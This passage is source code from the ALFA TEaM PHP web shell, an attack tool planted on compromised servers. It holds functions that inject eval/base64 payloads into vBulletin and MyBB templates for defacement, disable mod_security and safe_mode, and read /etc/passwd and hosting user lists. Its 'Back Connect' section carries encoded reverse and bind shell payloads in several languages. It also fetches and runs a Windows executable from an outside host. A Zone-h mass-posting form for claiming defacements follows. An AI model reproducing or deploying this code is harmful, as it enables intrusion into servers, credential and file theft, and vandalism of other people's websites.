2343. $index=str_replace("\'","'",$index);
2344. $set_index = "{\${eval(base64_decode(\'";
2345. $set_index .= __ZW5jb2Rlcg("echo \"$index\";
2346. ");
2347. $set_index .= "\'))}}{\${exit()}}";
2348. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){ $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2349. $loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
2350. $loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
2351. $loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
2352. @mysqli_query($conn,$loli1) or die (mysqli_error($conn));
2353. @mysqli_query($conn,$loli2) or die (mysqli_error($conn));
2354. @mysqli_query($conn,$loli3) or die (mysqli_error($conn));
2355. __alert('VB index changed...!');
2356. } } } if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) { echo __pre();
2357. ALfaNum(1,2,3,4,5);
2358. echo "<center><center><div class='txtfont_header'>| Mybb |</div>
2359. <p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value);
2360. return false;
2361. \" method=POST action=''>
2362. ";
2363. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50') );
2364. create_table($table);
2365. echo "<br><div class='txtfont'>| Your Index |</div><br>
2366. <textarea name=mybbindex rows='19' cols='103'>
2367. <title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
2368. if(isset($_POST['alfa6'])){ $mybb_dbh = $_POST['alfa6'];
2369. $mybb_dbu = $_POST['alfa7'];
2370. $mybb_dbn = $_POST['alfa8'];
2371. $mybb_dbp = $_POST['alfa9'];
2372. $mybb_index = $_POST['alfa10'];
2373. if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){ $conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
2374. $prefix="mybb_";
2375. $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
2376. $result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
2377. __alert('MyBB index changed...!');
2378. } } } echo "</div>";
2379. alfafooter();
2380. } function alfaproc() { alfahead();
2381. echo "<Div class=header><br><center>";
2382. if(empty($_POST['ajax'])&&!empty($_POST['alfa1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
2383. if($GLOBALS['sys']=="win"){ $process=array( "Task List" =>"tasklist /V", "System Info" =>"systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );
2384. }else{ $process=array( "Process status" => "ps aux", "Syslog" =>"cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" =>"cat /etc/hosts", "Cpuinfo"=>"cat /proc/cpuinfo", "Version"=>"cat /proc/version", "Sbin"=>"ls -al /usr/sbin", "Interrupts"=>"cat /proc/interrupts", "lsattr"=>"lsattr -va", "Uptime"=>"uptime", "Fstab" =>"cat /etc/fstab" );
2385. } foreach($process as $n => $link) { echo '<a href="javascript:void(0);
2386. " onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
2387. } echo "</center><br>";
2388. if(!empty($_POST['alfa1'])) { echo "<pre class='ml1' style='margin-top:5px' >";
2389. echo alfaEx($_POST['alfa1']);
2390. echo '</pre>';
2391. } echo "</div>";
2392. alfafooter();
2393. } function alfasafe() { alfahead();
2394. ALfaNum(9,10);
2395. echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
2396. echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
2397. if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains') {if(!@file_exists("/etc/virtual/domainowners")){ echo __pre();
2398. $solevisible9 = @file('/etc/named.conf');
2399. if(is_array($solevisible9)){ foreach($solevisible9 as $solevisible13){ if(@eregi('zone',$solevisible13)){ preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
2400. if(strlen(trim($solevisible14[1][0])) > 2){ echo $solevisible14[1][0].'<br>';
2401. }}} } }else{ echo __pre();
2402. $users = @file("/etc/virtual/domainowners");
2403. if(is_array($users)){ foreach($users as $boz){ $dom = explode(":",$boz);
2404. echo $dom[0]."\n";
2405. }}}} if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases') { ALfaNum(5,8,10,4,3,2,1);
2406. echo '
2407. <form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\');
2408. return false;
2409. " method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
2410. if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){ if(!@file_exists("/etc/virtual/domainowners")){ if(function_exists("posix_getpwuid") && function_exists("fileowner")){ $site = trim($_POST['alfa7']);
2411. $rep = str_replace(array("https://","http://","www."),"",$site);
2412. if(@$user = posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){ if($user['name']!= 'root'){ echo __pre()."<center><table border='1'>
2413. <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user['name']}</font></b></td></tr>
2414. <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr>
2415. </table>
2416. </center>";
2417. }}} else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';
2418. } }else{ $site = trim($_POST['alfa7']);
2419. $rep = str_replace(array("https://","http://","www."),"",$site);
2420. $users = @file("/etc/virtual/domainowners");
2421. foreach($users as $boz){ $ex = explode(":",$boz);
2422. if($ex[0] == $rep){ echo __pre()."<center><table border='1'>
2423. <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
2424. <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
2425. break;
2426. }}}}} if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])) { if(!@file_exists("/etc/virtual/domainowners")){ echo __pre();
2427. $i = 0;
2428. while ($i < 60000) { @$line = posix_getpwuid($i);
2429. if (!empty($line)) { while (list ($key, $vl) = each($line)){ echo $vl."\n";
2430. break;
2431. }}$i++;
2432. } }else{echo __pre();
2433. $users = @file("/etc/virtual/domainowners");
2434. foreach($users as $boz){ $user = explode(":",$boz);
2435. echo trim($user[1]).'<br>';
2436. }}} if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){ echo __pre();
2437. if(strlen(alfaEx("id"))>0){echo alfaEx("cat /etc/passwd");
2438. } elseif(function_exists("file_get_contents") && @is_readable("/etc/passwd")){ echo @file_get_contents("/etc/passwd");
2439. } elseif(function_exists("posix_getpwuid")){ for($uid=0;
2440. $uid<60000;
2441. $uid++){ $ara = @posix_getpwuid($uid);
2442. if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:";
2443. }print "\n";
2444. }} } else{__alert('bypass failed...');
2445. }} if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){ @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
2446. echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
2447. } if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){ @__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPass By Sole Sad & Invisible(ALFA TEaM)");
2448. @__write_file($GLOBALS['cwd']."ini.php","<?\necho ini_get('safe_mode');
2449. \necho ini_get('open_basedir');
2450. \ninclude(\$_GET['file']);
2451. \nini_restore('safe_mode');
2452. \nini_restore('open_basedir');
2453. \necho ini_get('safe_mode');
2454. \necho ini_get('open_basedir');
2455. \ninclude(\$_GET['ss']);
2456. \n?>");
2457. echo '<center><b><big> php.ini && ini.php created...!</center></b></big>';
2458. } if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){ @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
2459. echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
2460. } echo "<br></div>";
2461. alfafooter();
2462. } function __get_resource($content){ return @gzinflate(__ZGVjb2Rlcg($content));
2463. } function __write_file($file, $content){ if($fh = @fopen($file, "wb")){ if(fwrite($fh, $content)!==false) return true;
2464. } return false;
2465. } function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){ $res = "<font color='green'>[ Success...! ]</font>";
2466. $err = "<font color='red'>[ Failed...! ]</font>";
2467. if($evalOptions!="") $evalOptions = $evalOptions." ";
2468. if($evalArguments!="") $evalArguments = " ".$evalArguments;
2469. if($evalType=="c"){ $tmpdir = ALFA_TEMPDIR;
2470. chdir($tmpdir);
2471. if(is_writable($tmpdir)){ $uniq = substr(md5(time()),0,8);
2472. $filename = $evalType.$uniq.".c";
2473. $path = $filename;
2474. if(__write_file($path, $evalCode)){ $ext = ($GLOBALS['sys']=='win')? ".exe":".out";
2475. $pathres = $filename.$ext;
2476. $evalOptions = "-o ".$pathres." ".$evalOptions;
2477. $cmd = "gcc ".$evalOptions.$path;
2478. alfaEx($cmd);
2479. if(is_file($pathres)){ if(chmod($pathres, 0755)){ $cmd = $pathres.$evalArguments;
2480. alfaEx($cmd);
2481. }else{$res = $err;
2482. } unlink($pathres);
2483. }else{$res = $err;
2484. } unlink($path);
2485. }else{$res = $err;
2486. } } return $res;
2487. }elseif($evalType=="java"){ $tmpdir = ALFA_TEMPDIR;
2488. chdir($tmpdir);
2489. if(is_writable($tmpdir)){ if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){ $classname = trim($r[1]);
2490. $filename = $classname;
2491. }else{ $uniq = substr(md5(time()),0,8);
2492. $filename = $evalType.$uniq;
2493. $evalCode = "class ".$filename." { ".$evalCode . " } ";
2494. } $path = $filename.".java";
2495. if(__write_file($path, $evalCode)){ $cmd = "javac ".$evalOptions.$path;
2496. alfaEx($cmd);
2497. $pathres = $filename.".class";
2498. if(is_file($pathres)){ if(chmod($pathres, 0755)){ $cmd = "java ".$filename.$evalArguments;
2499. alfaEx($cmd);
2500. }else{$res = $err;
2501. } unlink($pathres);
2502. }else{$res = $err;
2503. } unlink($path);
2504. }else{$res = $err;
2505. } } return $res;
2506. } return false;
2507. } function alfaconnect(){ alfahead();
2508. $php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
2509. $python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
2510. $perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
2511. $ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
2512. $node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
2513. $c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
2514. $java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
2515. $alfacgi="fZFPawIxEMXvgt9hGgX14IZC6WFdl1YpxYO3HgVJdsd1af4sSZTupZ+9SXaRBYunJO/3MjO8mTzRizWU14o2aAQsd/EtdMEE5UyVktVqPJpYLfBa25oLfKu8JpJCy/HoYhG2n7tVd9vv9h9pumEWX1+8NB41plYOyFYrh8otXdtgCg5/HD07KQ7qoMjq5sqClg8FVzuB+bs4MfhCJn9DK9hsM9qBoZXrsgVeFVpos55xwYrvWTTIFqaCqQpgDQavaLqJ0/RixLFhhsk5CZwserN65FQ3GzMPS3ocrV3vNZRY6BKPPGYzj2rE6p6pCEL9O+TFAG1rHfomWJw1PEPup7CJkw0ZwNgiIUCSqeqO/nNMbE6yk18K9HkZLH1ayb9/EpLR4M3JYpA3DYHnGe139gc=";
2516. echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
2517. echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);
2518. return false;
2519. \">
2520. <div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);
2521. ' style='width:120px;
2522. '><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
2523. $cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
2524. foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");
2525. } echo "</select> <div id='bcipAction' style='display:inline-block;
2526. '><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;
2527. ' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;
2528. ' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
2529. if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){ $lang = $_POST['alfa1'];
2530. $ip = $_POST['alfa2'];
2531. $port = $_POST['alfa3'];
2532. $arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
2533. $tmpdir = ALFA_TEMPDIR;
2534. $name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
2535. $allow = array('perl','ruby','python','node');
2536. eval('$lan=$'.$lang.';
2537. ');
2538. if(in_array($lang,$allow)){ if(__write_file($name,__get_resource($lan))){ if(strlen(alfaEx('whoami'))>0){ $os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
2539. $out = alfaEx("$lang $name $arg $os");
2540. if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";
2541. } echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
2542. @unlink($name);
2543. }else{ @mkdir('cgialfa',0755);
2544. @chdir('cgialfa');
2545. alfacgihtaccess('cgi');
2546. __write_file('bc.alfa',__get_resource($alfacgi));
2547. @chmod("bc.alfa", 0755);
2548. if(substr($name,0,1)=='.'){$name='.'.$name;
2549. } echo("<pre class=ml1 style='margin-top:5px'>");
2550. echo AlfaiFrameCreator("cgialfa/bc.alfa?arg=".strrev(__ZW5jb2Rlcg($arg))."&lang=".strrev(__ZW5jb2Rlcg($lang))."&n=".strrev(__ZW5jb2Rlcg($name)),'0','0');
2551. echo("<center><font color='green'>[ Finished...! ]</font>");
2552. echo("</pre>");
2553. } }else{ echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
2554. } } if($lang=='java'||$lang=='c'){ $code = __get_resource($lan);
2555. $out = nl2br(bcinit($lang, $code,'',''));
2556. echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
2557. } if($lang=='bcwin'){ $alfa = new AlfaCURL();
2558. $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
2559. $tmpdir = ALFA_TEMPDIR;
2560. $f = @fopen($tmpdir.'/bcwin.exe','w+');
2561. @fwrite($f, $s);
2562. @fclose($f);
2563. $out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
2564. @unlink($tmpdir.'/bcwin.exe');
2565. } if($lang=='php'){ echo "<pre class=ml1 style='margin-top:5px'>";
2566. $code = __get_resource($lan);
2567. if($code!==false){ $code = "\$target = \"".$arg."\";
2568. \n".$code;
2569. eval($code);
2570. echo("<center><font color='green'>[ Finished...! ]</font></center>");
2571. } echo "</pre>";
2572. } } echo "</div>";
2573. alfafooter();
2574. } function alfazoneh(){ alfahead();
2575. echo '<div class=header>';
2576. if(!function_exists('curl_version')){ echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
2577. } $hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
2578. $reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
2579. echo '
2580. <center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
2581. <form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\');
2582. return false;
2583. ">
2584. <input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
2585. <br>
2586. <select id="text" name="hackmode" style="width:400px;
2587. ">';
2588. $x=1;
2589. foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);
